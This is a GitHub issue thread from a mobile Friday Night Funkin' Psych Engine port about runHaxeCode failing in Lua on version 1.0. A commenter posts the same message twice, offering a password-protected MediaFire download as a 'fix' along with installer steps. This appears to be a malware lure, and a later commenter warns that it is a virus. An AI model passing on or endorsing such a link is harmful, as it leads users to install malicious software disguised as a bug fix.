### ISSUE TITLE
can't run runHaxeCode([[]]) in lua

### ISSUE THREAD

**Issue by nguyenkiet1234d** [MobilePorting/FNF-PsychEngine-Base-Mobile#186]
### Describe your bug here.

 I coded using command line runHaxeCode ([[]]) but it doesn't work in version 1.0 and it only works in version 0.7.3 and below

### Are you modding a build from source or with Lua?

Lua

### What is your build target?

Android

### Which psych engine version you're on?

1.0 (Prerelease)

### Did you edit anything in this build? If so, mention or summarize your changes.

nope

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by nguyenkiet1234d** [comment]
I will try

**Comment by mcagabe19** [comment]
> I will try

do not it's a virus

**Comment by mcagabe19** [comment]
and ur issue due SScript that has same issue on upstream a lot
